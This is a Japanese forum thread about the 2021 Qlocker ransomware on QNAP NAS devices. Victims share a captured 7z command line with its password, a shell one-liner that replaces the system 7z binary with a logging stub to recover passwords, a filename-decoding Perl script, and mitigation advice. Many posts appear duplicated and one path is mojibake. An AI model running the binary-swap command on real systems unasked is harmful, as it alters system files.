ほんと鳥肌たちました!!ありがとうございます!
さらにセキュリティーの教訓になりました。
これを機にもっと勉強します。
ほんとありがとうございました!!
/proc/23324:/usr/local/sbin/7z.orig "a" "-mx=0" "-sdel"
"-pOffbS4U3mIxf9s1D01HHtexr6jjCSHWm"
"/share/CACHEDEV1_DATA/share/缺P~D筐C~P筐C~C筐B・
~B≪~C~C筐C~W/大聿[2;1H畿罕~X-筝~J綏~]筝~J 190530/
Public/Music/Sony MediaPlayerX/Shared/Music/DisnB≪~C~
J筐A・~[・~A・コ苙N~K 筐B・~C・~B吾~C~J筐C・~C祉~B
泣~B・~C潟~C~I筐C~H筐C・
264不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/25(日) 00:39:51.24ID:MioQnPzi0 /usr/local/sbin以下の7zってコピー出来ないんですか?
ssh接続でcopy コマンド打っても
copy: command not found
と出てファイルを動かせないのですが…
ssh接続でcopy コマンド打っても
copy: command not found
と出てファイルを動かせないのですが…
265不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/25(日) 00:43:23.59ID:nQHR7+0/0 中身がシェルスクリプトの偽7z、効くんだね
32文字数える人が多発しなくて済むように
「-p がパスワード指定オプション、次の文字からパスワード」
32文字数える人が多発しなくて済むように
「-p がパスワード指定オプション、次の文字からパスワード」
266不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/25(日) 00:44:40.69ID:yQmWuWYL0 現在のQlockerへの対処方法
1.あきらめる
2.身代金を払う
3.TestDiskを使用して暗号化後に削除されたファイルをレスキュー?
4.運が良ければ 7z.log に保存されていたパスワードでファイルを復活する
Qlockerで狙われた脆弱性がすべて解消されたかどうかはわからないので
インターネットから接続できないようにした方が良い
自分もいつやられるかと心配している…
1.あきらめる
2.身代金を払う
3.TestDiskを使用して暗号化後に削除されたファイルをレスキュー?
4.運が良ければ 7z.log に保存されていたパスワードでファイルを復活する
Qlockerで狙われた脆弱性がすべて解消されたかどうかはわからないので
インターネットから接続できないようにした方が良い
自分もいつやられるかと心配している…
267不明なデバイスさん (ワッチョイ ef69-fX9O)
2021/04/25(日) 00:45:35.77ID:Y2xQ2RLo0 マルウェアって怖いんだな
これはやっとけって対策はテンプレ化出来ないかな?
これはやっとけって対策はテンプレ化出来ないかな?
268不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/25(日) 00:51:27.67ID:MioQnPzi0269不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/25(日) 00:59:24.11ID:yQmWuWYL0 >>267
1.Malware Removerの最新版をインストールしてスキャン実行
2.https://www.qnap.com/ja-jp/news/2021/qlocker-%E3%81%AB%E3%82%88%E3%82%8B%E3%83%A9%E3%83%B3%E3%82%B5%E3%83%A0%E3%82%A6%E3%82%A7%E3%82%A2%E6%94%BB%E6%92%83%E3%81%AB%E5%AF%BE%E3%81%99%E3%82%8B%E3%81%94%E6%A1%88%E5%86%85qnap-nas-%E3%82%92%E5%AE%89%E5%85%A8%E3%81%AB%E3%81%8A%E4%BD%BF%E3%81%84%E3%81%84%E3%81%9F%E3%81%A0%E3%81%8F%E3%81%9F%E3%82%81%E3%81%AB
3.ルーターでのUPnPの停止とNASへのポート開放の削除
4.myqnapcloudの利用停止
5.Qufirewallで海外からのアクセスをフィルタリング
6.Multimedia Console、Media Streaming Add-on、およびHBS(Hybrid Backup Sync)の停止
1.Malware Removerの最新版をインストールしてスキャン実行
2.https://www.qnap.com/ja-jp/news/2021/qlocker-%E3%81%AB%E3%82%88%E3%82%8B%E3%83%A9%E3%83%B3%E3%82%B5%E3%83%A0%E3%82%A6%E3%82%A7%E3%82%A2%E6%94%BB%E6%92%83%E3%81%AB%E5%AF%BE%E3%81%99%E3%82%8B%E3%81%94%E6%A1%88%E5%86%85qnap-nas-%E3%82%92%E5%AE%89%E5%85%A8%E3%81%AB%E3%81%8A%E4%BD%BF%E3%81%84%E3%81%84%E3%81%9F%E3%81%A0%E3%81%8F%E3%81%9F%E3%82%81%E3%81%AB
3.ルーターでのUPnPの停止とNASへのポート開放の削除
4.myqnapcloudの利用停止
5.Qufirewallで海外からのアクセスをフィルタリング
6.Multimedia Console、Media Streaming Add-on、およびHBS(Hybrid Backup Sync)の停止
270不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/25(日) 01:02:38.88ID:MioQnPzi0 あーーーこれやっぱり暗号化されてる最中じゃないとなんにも出来ないんだね…。
暗号化完了したらもう打つ手なし 終わりかな
暗号化完了したらもう打つ手なし 終わりかな
271不明なデバイスさん (ワッチョイ 09a5-Nexr)
2021/04/25(日) 01:20:22.08ID:ZTplm9/w0 257です。
やっぱりいろいろやったけどだめでadminリセットしました。
結果としてログイン、sshはできましたがログは見当たりませんでした。
やっぱりいろいろやったけどだめでadminリセットしました。
結果としてログイン、sshはできましたがログは見当たりませんでした。
272不明なデバイスさん (ワッチョイ 09a5-Nexr)
2021/04/25(日) 01:25:56.96ID:ZTplm9/w0 /mnt/HDA_ROOT
/share/CACHEDEV1_DATA/.qpkg/MalwareRemover/
みましたが見当たらず。
参考になるかわかりませんがそれっぽいログを
警告 2021-04-23 03:02:20 admin 127.0.0.1 Malware Remover Malware Removal [Malware Remover] Removed high-risk malware. Immediately update QTS and all applications to their latest versions and use stronger account passwords. Weak passwords make the system vulnerable to exploits and malware.
警告 2021-04-23 03:02:23 admin 127.0.0.1 Malware Remover Malware Removal [Malware Remover] Removed malware. You must restart the NAS.
警告 2021-04-23 03:02:24 admin 127.0.0.1 Malware Remover Malware Removal [Malware Remover] Removed the detected malware: MR2102
情報 2021-04-23 03:02:24 admin 127.0.0.1 Malware Remover General [Malware Remover] Scan completed.
情報 2021-04-24 00:33:28 admin 127.0.0.1 App Center App Installation [App Center] Installed Malware Remover4.6.1.1 in "/share/CACHEDEV1_DATA/.qpkg/MalwareRemover".
/share/CACHEDEV1_DATA/.qpkg/MalwareRemover/
みましたが見当たらず。
参考になるかわかりませんがそれっぽいログを
警告 2021-04-23 03:02:20 admin 127.0.0.1 Malware Remover Malware Removal [Malware Remover] Removed high-risk malware. Immediately update QTS and all applications to their latest versions and use stronger account passwords. Weak passwords make the system vulnerable to exploits and malware.
警告 2021-04-23 03:02:23 admin 127.0.0.1 Malware Remover Malware Removal [Malware Remover] Removed malware. You must restart the NAS.
警告 2021-04-23 03:02:24 admin 127.0.0.1 Malware Remover Malware Removal [Malware Remover] Removed the detected malware: MR2102
情報 2021-04-23 03:02:24 admin 127.0.0.1 Malware Remover General [Malware Remover] Scan completed.
情報 2021-04-24 00:33:28 admin 127.0.0.1 App Center App Installation [App Center] Installed Malware Remover4.6.1.1 in "/share/CACHEDEV1_DATA/.qpkg/MalwareRemover".
273不明なデバイスさん (ワッチョイ 09a5-Nexr)
2021/04/25(日) 01:27:42.40ID:ZTplm9/w0 アップデート前のremoverが先にマルウェアを削除してしまったのがまずかったんですかね?
アップデート後のスキャンは特に検出がないようです。
アップデート後のスキャンは特に検出がないようです。
274不明なデバイスさん (ワッチョイ 2e9f-abm2)
2021/04/25(日) 01:54:21.31ID:F5U07W8M0 >268
自分の場合、
ファームウェア更新かけて自動で再起動するものと思っていて
今日夕方、NASにログインしたら 更新完了したから再起動する? って聞いてきていて
急いで OKクリック。
更新後、ちょっと不安になって
フリーソフトの everything でNAS内で1フォルダ
(フォルダ名:share)で300GBくらい使っているところ検索かけたら
.このフォルダ内のファイルが .7zになっていました。
そしてQuログみたら23日の午前2時に malware remover が自動で削除してくれてました。
感染時間1日半でした。幸い、share内のバックアップデータファイルだったんで
そこまで喪失感はありませんでしたが。
おそらく。 malware remover を21日に最新版に更新していたので
(知り合いでQnapNAS使っているところから最初話しを聞いてすぐに
APpcenter全て更新とファームウェア更新したが再起動はしていなかった)
最新バージョンだと削除と同時に 7z.logを残すのかなあと思いました。
尚、知り合いはNASのファイル容量が少なかったため malware remover で
削除する前にプロスが消失していたぽいです。
もっと早く気づけてれば手動で remover できたけども、そのころの
reomover のバージョンではログださなかったかもです。
自分の場合、
ファームウェア更新かけて自動で再起動するものと思っていて
今日夕方、NASにログインしたら 更新完了したから再起動する? って聞いてきていて
急いで OKクリック。
更新後、ちょっと不安になって
フリーソフトの everything でNAS内で1フォルダ
(フォルダ名:share)で300GBくらい使っているところ検索かけたら
.このフォルダ内のファイルが .7zになっていました。
そしてQuログみたら23日の午前2時に malware remover が自動で削除してくれてました。
感染時間1日半でした。幸い、share内のバックアップデータファイルだったんで
そこまで喪失感はありませんでしたが。
おそらく。 malware remover を21日に最新版に更新していたので
(知り合いでQnapNAS使っているところから最初話しを聞いてすぐに
APpcenter全て更新とファームウェア更新したが再起動はしていなかった)
最新バージョンだと削除と同時に 7z.logを残すのかなあと思いました。
尚、知り合いはNASのファイル容量が少なかったため malware remover で
削除する前にプロスが消失していたぽいです。
もっと早く気づけてれば手動で remover できたけども、そのころの
reomover のバージョンではログださなかったかもです。
275不明なデバイスさん (ワッチョイ 3868-On6t)
2021/04/25(日) 02:38:30.45ID:WZ6eeCr10 マイニング用途でのHDD需要、確かに品薄にはなってますが、まだ何とか耐えているんですかね。
8TB以上が買い漁られているとの事でしたが。
8TB以上が買い漁られているとの事でしたが。
276不明なデバイスさん (ワッチョイ 3868-On6t)
2021/04/25(日) 02:40:00.66ID:WZ6eeCr10 全然耐えてませんでしたね、
大容量の売ってないですね。
大容量の売ってないですね。
278不明なデバイスさん (ワッチョイ 2e9f-abm2)
2021/04/25(日) 08:44:02.12ID:F5U07W8M0 274です。すみません。昨日はパスワード分かってやったー!って思いまして
今朝実際に解凍すると日本語のファイル名の場合、ファイル名が文字化けしてしまっていました。
例 手順書.txt.7z を解凍すると
手順書.txt という名前のフォルダができてその中に元のファイルがマクロ手順.txt
といった感じでできます。
7z , cube ice , winrar で試しましたがいうれも文字化けしてしまいました。
SSHなどで自動一括で解凍時のフォルダ名をファイル名に変更するみたいな事かもしくは
今回と逆に .7zだけ取るということはできないものでしょうか。
ご教授頂けると幸いです。
今朝実際に解凍すると日本語のファイル名の場合、ファイル名が文字化けしてしまっていました。
例 手順書.txt.7z を解凍すると
手順書.txt という名前のフォルダができてその中に元のファイルがマクロ手順.txt
といった感じでできます。
7z , cube ice , winrar で試しましたがいうれも文字化けしてしまいました。
SSHなどで自動一括で解凍時のフォルダ名をファイル名に変更するみたいな事かもしくは
今回と逆に .7zだけ取るということはできないものでしょうか。
ご教授頂けると幸いです。
279不明なデバイスさん (ワッチョイ 2a07-On6t)
2021/04/25(日) 09:31:40.23ID:vQvtvi6/0 もしかしてプライベートアドレスしか許可してないわいは高みの見物?
280不明なデバイスさん (ワッチョイ 8a3d-2tiM)
2021/04/25(日) 09:48:15.53ID:UMG1ShY20281不明なデバイスさん (ワッチョイ 4259-o8NC)
2021/04/25(日) 11:04:24.80ID:/RFz17op0 1.あきらめる
→諦めたくない
2.身代金を払う
→払いたくないし解除失敗報告が出てる
3.TestDiskを使用して暗号化後に削除されたファイルをレスキュー?
→元から割と容量逼迫してたのでおそらく7zに置き換えられたときに残骸を上書き済
4.運が良ければ 7z.log に保存されていたパスワードでファイルを復活する
→一度シャットダウンしてしまってる
なので新しいNAS買って完全内部運用で再スタートして
死んだNASは自宅の慰霊碑にしていつか総当たりが高速化して
現実的な解読時間になったときのために取っておくよ…
→諦めたくない
2.身代金を払う
→払いたくないし解除失敗報告が出てる
3.TestDiskを使用して暗号化後に削除されたファイルをレスキュー?
→元から割と容量逼迫してたのでおそらく7zに置き換えられたときに残骸を上書き済
4.運が良ければ 7z.log に保存されていたパスワードでファイルを復活する
→一度シャットダウンしてしまってる
なので新しいNAS買って完全内部運用で再スタートして
死んだNASは自宅の慰霊碑にしていつか総当たりが高速化して
現実的な解読時間になったときのために取っておくよ…
282不明なデバイスさん (ワッチョイ df36-Rk3w)
2021/04/25(日) 11:33:11.46ID:yQmWuWYL0 >>278
sshを使う環境になれていない人はBATファイルとexcelでできるんじゃない?
1 エクスプローラーでshiftを押してパスを含めたファル名をコピー
2 excelで一列目をCOPY、二列目を空白、三列目をコピーしたパス、四列目を空白、五列目を三列目をコピーしたパス
から最後の¥以降を削除したもの
3 テキスト形式で保存
4 拡張子をBATにして実行
細部を詰める必要があるけどこんな感じで。
sshを使う環境になれていない人はBATファイルとexcelでできるんじゃない?
1 エクスプローラーでshiftを押してパスを含めたファル名をコピー
2 excelで一列目をCOPY、二列目を空白、三列目をコピーしたパス、四列目を空白、五列目を三列目をコピーしたパス
から最後の¥以降を削除したもの
3 テキスト形式で保存
4 拡張子をBATにして実行
細部を詰める必要があるけどこんな感じで。
284不明なデバイスさん (ワッチョイ df36-Rk3w)
2021/04/25(日) 11:45:41.44ID:yQmWuWYL0 あと、windowdsのフリーアプリの「お〜瑠璃ね〜む」で一括リネームできるかも
286不明なデバイスさん (ワッチョイ df36-Rk3w)
2021/04/25(日) 12:04:20.87ID:yQmWuWYL0 インストールさえしていればmalware removerは自動更新なので感染した時期が遅ければ7z.logがある可能性はちょっとだけある
287不明なデバイスさん (ワッチョイ 9a4b-XmRv)
2021/04/25(日) 12:18:36.46ID:X5re0GUb0 普通被害拡大を考えてシャットダウンするよね…
288不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/25(日) 12:35:13.00ID:nQHR7+0/0 手順書.txt でなく マクロ手順.txt だと思うんだけど…
これが動く環境の人は自力で解決しちゃう人じゃないかと書いてから気づいた
#!/usr/bin/env perl
use Encode;
#use HTML::Entities;
my $terminal = 'cp932'; # 環境に合わせて cp932 とか utf8 とか選ぶ
# while (<>) { # 実際はこっちで hoge.pl < encoded.list > decoded.list する
while (<DATA>) {
# print encode($terminal, decode('utf8', decode_entities($_))), "\n";
s/&#(\d+);/pack('C', $1)/ge;
print encode($terminal, decode('utf8', $_)), "\n";
}
__DATA__
マクロ手順.txt
これが動く環境の人は自力で解決しちゃう人じゃないかと書いてから気づいた
#!/usr/bin/env perl
use Encode;
#use HTML::Entities;
my $terminal = 'cp932'; # 環境に合わせて cp932 とか utf8 とか選ぶ
# while (<>) { # 実際はこっちで hoge.pl < encoded.list > decoded.list する
while (<DATA>) {
# print encode($terminal, decode('utf8', decode_entities($_))), "\n";
s/&#(\d+);/pack('C', $1)/ge;
print encode($terminal, decode('utf8', $_)), "\n";
}
__DATA__
マクロ手順.txt
289不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/25(日) 12:43:31.47ID:yQmWuWYL0 >>284
Flexible Renamerで"\f.\e"でいけるぽい
Flexible Renamerで"\f.\e"でいけるぽい
290不明なデバイスさん (ワッチョイ b6b7-msKI)
2021/04/25(日) 13:01:37.11ID:QFz+payI0 結局感染ルートは何だったの?
291不明なデバイスさん (ササクッテロラ Spc1-HbPS)
2021/04/25(日) 13:12:20.56ID:xz7Kji8Fp 272です。
qnapから問い合わせの返答がありました。
仕事中なので詳しくはまたカキコしようと思いますが、logを取得できるのは暗号化が実行中の時のようです。
マルウェアリムーバーがウイルスの実行中に削除していればlogが残るということかもしれません(これは推測)
qnapから問い合わせの返答がありました。
仕事中なので詳しくはまたカキコしようと思いますが、logを取得できるのは暗号化が実行中の時のようです。
マルウェアリムーバーがウイルスの実行中に削除していればlogが残るということかもしれません(これは推測)
292不明なデバイスさん (ワッチョイ 4259-o8NC)
2021/04/25(日) 13:20:59.31ID:/RFz17op0 >>287
ケーブル抜いてシャットダウンしないが正解だったんだろうけど
シャットダウンしなかったら暗号化がさらに進むからねえ
海外フォーラム見てたら7z.log吐き出させる手段が見れてた時刻なんだが
本当に失敗したよ
ケーブル抜いてシャットダウンしないが正解だったんだろうけど
シャットダウンしなかったら暗号化がさらに進むからねえ
海外フォーラム見てたら7z.log吐き出させる手段が見れてた時刻なんだが
本当に失敗したよ
294不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/25(日) 14:10:27.69ID:MioQnPzi0 malware removerって元々入れておくようなソフトだったのか…
295不明なデバイスさん (ワッチョイ f87d-On6t)
2021/04/25(日) 14:15:07.08ID:CckfsOgo0 会社でQNAP使っててやられたところは大変だろうなぁ
296不明なデバイスさん (ワッチョイ dc3d-2tiM)
2021/04/25(日) 15:03:02.22ID:yK5iDcHU0 月曜からこのスレに質問殺到したりしてなw
297不明なデバイスさん (オイコラミネオ MM71-tA8s)
2021/04/25(日) 15:13:25.90ID:QwdyEIdTM UPnPは無効にした、危険って分かっていながら使ってたけどこういうことがあると使い辛い
いろいろ対応を考えないと今まで通りに使えなくなってしまうからつらい
なんだかコロナみたいだ
いろいろ対応を考えないと今まで通りに使えなくなってしまうからつらい
なんだかコロナみたいだ
298不明なデバイスさん (ワッチョイ ae81-On6t)
2021/04/25(日) 15:22:40.04ID:gS7vO+4K0 気が付かずにいて、今この瞬間も7z化が進行してるやつがいるんだろうね。
299不明なデバイスさん (ワッチョイ ae81-On6t)
2021/04/25(日) 15:26:59.49ID:gS7vO+4K0 インターネットに公開するってこういうことなんだよな。
ちょっとしたことが簡単に致命傷になってしまうけど、全部自己責任。
ちょっとしたことが簡単に致命傷になってしまうけど、全部自己責任。
300不明なデバイスさん (ワッチョイ 9a4b-XmRv)
2021/04/25(日) 16:32:29.95ID:X5re0GUb0 今回は規模がそれなりに大きそうだから捜査機関が動いて逮捕されそうな気もするけどロシアとかだとなぁ
301不明なデバイスさん (ワッチョイ b6b7-msKI)
2021/04/25(日) 17:23:37.73ID:QFz+payI0 Multimediaフォルダ配下のファイルに7zが無ければ安心してよいのかな
302不明なデバイスさん (ワッチョイ e75f-is1i)
2021/04/25(日) 18:17:03.31ID:JDKfD28P0 初歩的な質問ですまん
現時点でやられて暗号化され始めているかどうかはFile Stationで7zファイルを検索して判断はまずいのかな。
とりあえず2021年以降に生成された7zファイルは無かった
ログでも怪しい履歴はなさそう
Malware RemoverはこれからDLしてスキャンします。
今後のための対処はAdmin無効化済、
ポート変更はこの後対応します
現時点でやられて暗号化され始めているかどうかはFile Stationで7zファイルを検索して判断はまずいのかな。
とりあえず2021年以降に生成された7zファイルは無かった
ログでも怪しい履歴はなさそう
Malware RemoverはこれからDLしてスキャンします。
今後のための対処はAdmin無効化済、
ポート変更はこの後対応します
303不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/25(日) 18:18:47.88ID:yQmWuWYL0 一番最初にやるべきことは7zファイルを探すことではなく
Malware Removerの最新版を実行すること
Malware Removerの最新版を実行すること
304不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/25(日) 18:19:47.04ID:yQmWuWYL0 一番最初にやるべきことは7zファイルを探すことではなく
Malware Removerの最新版を実行すること
大事なことななので
Malware Removerの最新版を実行すること
大事なことななので
305不明なデバイスさん (ワッチョイ 6fa0-b+U1)
2021/04/25(日) 19:01:48.59ID:ef9ROGi40 QTSのサポート4.5.xまでだった機種が軒並み「完全」まで延びてね?
306不明なデバイスさん (ワッチョイ dc3d-2tiM)
2021/04/25(日) 19:50:17.61ID:yK5iDcHU0 HBSって同期先のフォルダ設定するとlatestとか勝手に階層切ってくるけど既にrsyncとかで手動で同期してた既存のバックアップ先のフォルダがある場合にそのファイル群を生かして差分だけHBSでバックアップさせるのって無理かな。
1から全部削除してコピーし直すのが無駄だなーと。
1から全部削除してコピーし直すのが無駄だなーと。
307不明なデバイスさん (ワッチョイ 8cbb-On6t)
2021/04/25(日) 20:00:16.17ID:rUNfU2qg0 もしランサムウェアにやられて直ぐには対処できな場合、ひとまずそのNASをネットから切り離して
新しい機材ですぐにNASを構築することも検討すると思うけど今はHDDが無い!って場合もありそう
新しい機材ですぐにNASを構築することも検討すると思うけど今はHDDが無い!って場合もありそう
308不明なデバイスさん (ワッチョイ 2ecb-RU/7)
2021/04/25(日) 20:43:17.66ID:jW+oyIhZ0309不明なデバイスさん (アウアウウー Sa83-zvOL)
2021/04/25(日) 21:50:48.70ID:uRyqKbEEa310不明なデバイスさん (ワッチョイ df10-HEcZ)
2021/04/25(日) 22:08:12.58ID:x4GA2QAQ0 バックアップ用にHDD欲しいんだけどな
マイナーも転売屋も絶滅しろ
マイナーも転売屋も絶滅しろ
311不明なデバイスさん (ワッチョイ e201-Im0W)
2021/04/25(日) 22:36:41.21ID:pOyrI8Mu0 278です。月末と言うこともあり仕事建て込みで移動先で見てます。
>>280
ありがとうございます。エンコードの設定して確認してみます。
https://qiita.com/DaikichiDaze/items/4754352da1652d03dc85
windows上で一括ファイル名変換。
.7zファイルのファイル名群をリスト化
解凍後に 一括変換。
なんとなくわかりました。時間ができたときにやってみます。
>>280
ありがとうございます。エンコードの設定して確認してみます。
https://qiita.com/DaikichiDaze/items/4754352da1652d03dc85
windows上で一括ファイル名変換。
.7zファイルのファイル名群をリスト化
解凍後に 一括変換。
なんとなくわかりました。時間ができたときにやってみます。
312不明なデバイスさん (ワッチョイ 3868-On6t)
2021/04/25(日) 23:46:00.16ID:WZ6eeCr10313不明なデバイスさん (ワッチョイ e75f-is1i)
2021/04/25(日) 23:53:00.17ID:JDKfD28P0314不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/25(日) 23:55:03.76ID:MioQnPzi0 admin無効化にした場合って、今まで使ってたアプリはQTSのトップページに表示すること出来ないの?
appcenterから表示先を全ユーザメニューにしても出てくれないんだけど
appcenterから表示先を全ユーザメニューにしても出てくれないんだけど
315不明なデバイスさん (ワッチョイ 3868-On6t)
2021/04/25(日) 23:59:43.97ID:WZ6eeCr10 >>314
メインメニューからのドラッグアンドドロップで可能ですよ
メインメニューからのドラッグアンドドロップで可能ですよ
317不明なデバイスさん (ワッチョイ df10-HEcZ)
2021/04/26(月) 01:36:01.17ID:dqDH3VAh0 HBS3を最新版にアップデートしたらRTRRサーバーの設定が吹き飛んだ
一度アンインストールしたら直ったけど
ルーター新調した直後に同期がエラー起こしたので、ルーター設定を疑ってて時間がかかったわ
一度アンインストールしたら直ったけど
ルーター新調した直後に同期がエラー起こしたので、ルーター設定を疑ってて時間がかかったわ
318不明なデバイスさん (ブーイモ MM5e-HDr5)
2021/04/26(月) 09:37:00.63ID:gGwXjvxDM これmalware removerって手動で入れないといけないんかな。
319不明なデバイスさん (ワッチョイ 4602-3cD6)
2021/04/26(月) 10:17:46.83ID:e4S751C10 教えてください。
Puttyで
cd /usr/local/sbin; printf '#!/bin/sh \necho $@\necho $@>>/mnt/HDA_ROOT/7z.log\nsleep 60000' > 7z.sh; chmod +x 7z.sh; mv 7z 7z.bak; mv 7z.sh 7z;
をコピペしようとすると
<z.log\nsleep 60000' > 7z.sh; chmod +x 7z.sh; mv 7z 7z.bak; mv 7z.sh 7z;
と入力されてしまうのですが、何がおかしいのでしょうか
Puttyで
cd /usr/local/sbin; printf '#!/bin/sh \necho $@\necho $@>>/mnt/HDA_ROOT/7z.log\nsleep 60000' > 7z.sh; chmod +x 7z.sh; mv 7z 7z.bak; mv 7z.sh 7z;
をコピペしようとすると
<z.log\nsleep 60000' > 7z.sh; chmod +x 7z.sh; mv 7z 7z.bak; mv 7z.sh 7z;
と入力されてしまうのですが、何がおかしいのでしょうか
320不明なデバイスさん (ワッチョイ 6fa0-b+U1)
2021/04/26(月) 11:47:51.27ID:Dj1F5Gui0 >>318
QTS4.5.xならQTS初期化したら有無を言わさずインストールされるよ
QTS4.5.xならQTS初期化したら有無を言わさずインストールされるよ
321不明なデバイスさん (ワッチョイ df36-Rk3w)
2021/04/26(月) 11:48:36.90ID:VA5FMeJH0322不明なデバイスさん (ワッチョイ df36-Rk3w)
2021/04/26(月) 11:58:30.30ID:VA5FMeJH0 Qlocker に対して一番最初にやるべきことは
Malware Removerの最新版を実行すること
Qlockerがグレードアップしてたら手遅れだけど
Malware Removerの最新版を実行すること
Qlockerがグレードアップしてたら手遅れだけど
323不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/26(月) 12:30:24.16ID:EVzy48kp0324不明なデバイスさん (ブーイモ MM5e-HDr5)
2021/04/26(月) 13:06:19.81ID:mg/pusYnM >>320
そうですよね。4.3.6とかの古いのは手動ですよね。
そうですよね。4.3.6とかの古いのは手動ですよね。
325不明なデバイスさん (ブーイモ MMed-Rk3w)
2021/04/26(月) 14:02:02.88ID:GiGzrGpGM qnap japan のtwitterに情報が出たけど
記載されてる対処方法は不十分なものだな
記載されてる対処方法は不十分なものだな
326不明なデバイスさん (ペラペラ SD2a-Im0W)
2021/04/26(月) 16:26:03.57ID:hOlEbRSlD 普段ので本来の7z使う実装ってあるのかな。
ないなら7z実行時のコマンド全部記録してから実行するように改造しておいたらいいのかな。
ないなら7z実行時のコマンド全部記録してから実行するように改造しておいたらいいのかな。
327不明なデバイスさん (ブーイモ MM5e-HDr5)
2021/04/26(月) 17:05:45.49ID:jvzeoYlxM328不明なデバイスさん (ワッチョイ 4652-zvOL)
2021/04/26(月) 17:59:21.55ID:mWGop00M0 >>326
マルウェア、ウィルススキャンで圧縮ファイル内をスキャンする時に使うかもね。
マルウェア、ウィルススキャンで圧縮ファイル内をスキャンする時に使うかもね。
329319 (ワッチョイ 4602-3cD6)
2021/04/26(月) 19:12:53.60ID:e4S751C10 >321,323
アドバイスありがとうございます。
そうですか、NASがガリガリ言っているのに気が付き、フォルダをのぞいたら「!!!READ_ME.txt」
と7zに圧縮されたデータを見つけ焦ってしまい、とりあえず電源と通信ケーブルを抜いてしまいました。
そしてQnapサポートからのメールとフォーラムの翻訳を頼りに上のコマンドをやってしまいました。
そうですか、取り返しのつかないことになってしまったのですか orz
2年位前にもQnap狙いのランサムにやられたときはカスペルスキーさんが提供してくれた復号プログラムで助けられました。
今回はそういう期待は難しいでしょうか
アドバイスありがとうございます。
そうですか、NASがガリガリ言っているのに気が付き、フォルダをのぞいたら「!!!READ_ME.txt」
と7zに圧縮されたデータを見つけ焦ってしまい、とりあえず電源と通信ケーブルを抜いてしまいました。
そしてQnapサポートからのメールとフォーラムの翻訳を頼りに上のコマンドをやってしまいました。
そうですか、取り返しのつかないことになってしまったのですか orz
2年位前にもQnap狙いのランサムにやられたときはカスペルスキーさんが提供してくれた復号プログラムで助けられました。
今回はそういう期待は難しいでしょうか
330不明なデバイスさん (ワッチョイ fb54-On6t)
2021/04/26(月) 19:18:55.96ID:x9BXLUfM0 たったの1週間ぶりにスレ覗いたら祭り状態かよ参ったな
明確な侵入経路と侵入の痕跡の確認方法が知りたい
明確な侵入経路と侵入の痕跡の確認方法が知りたい
331不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/26(月) 19:34:16.12ID:VA5FMeJH0 【NASをQlockerランサムウェア攻撃から守る対策】
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
電源やLANケーブルを抜かないこと
> 【NASをQlockerランサムウェア攻撃から守る対策】
>
> ランサムウェアに攻撃されている場合、以下の手順に従ってください。
>
> ?
> 最新の Malware Remover をインストールし、マルウェアスキャンを実行
> ?
> Multimedia Console、Media Streaming Add-on、Hybrid Backup Sync を最新版に更新
>
> (続く)
https://twitter.com/qnapjapan/status/1386519922176446470
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
https://twitter.com/5chan_nel (5ch newer account)
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
電源やLANケーブルを抜かないこと
> 【NASをQlockerランサムウェア攻撃から守る対策】
>
> ランサムウェアに攻撃されている場合、以下の手順に従ってください。
>
> ?
> 最新の Malware Remover をインストールし、マルウェアスキャンを実行
> ?
> Multimedia Console、Media Streaming Add-on、Hybrid Backup Sync を最新版に更新
>
> (続く)
https://twitter.com/qnapjapan/status/1386519922176446470
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
一番最初にやることはQNAPアプリの最新の Malware Remover をインストールし、マルウェアスキャンを実行すること
https://twitter.com/5chan_nel (5ch newer account)
332不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/26(月) 19:35:58.83ID:VA5FMeJH0 大事なことなので10回言いました。
333不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/26(月) 19:45:24.12ID:65qQL2h70 今後またこういう事になったら嫌だから対策しておきたいんだけど、何しておけばいいのかな
NASのHDDの分ローカルにも同じ容量ミラーコピーしておく位しか無いのかな?
qufirewall入れてadmin無効化してても脆弱性で入られる危険性はあるんだよね?
NASのHDDの分ローカルにも同じ容量ミラーコピーしておく位しか無いのかな?
qufirewall入れてadmin無効化してても脆弱性で入られる危険性はあるんだよね?
334不明なデバイスさん (ワッチョイ d032-9mIh)
